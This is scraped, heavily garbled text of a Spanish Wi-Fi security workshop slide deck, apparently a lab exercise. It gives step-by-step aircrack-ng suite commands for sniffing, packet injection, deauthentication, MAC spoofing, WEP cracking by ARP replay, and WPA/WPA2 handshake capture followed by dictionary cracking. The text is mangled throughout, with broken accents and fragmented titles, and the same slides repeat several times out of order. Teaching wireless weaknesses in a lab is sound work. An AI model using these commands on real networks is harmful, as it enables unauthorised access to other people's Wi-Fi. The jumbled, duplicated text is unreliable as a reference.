bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
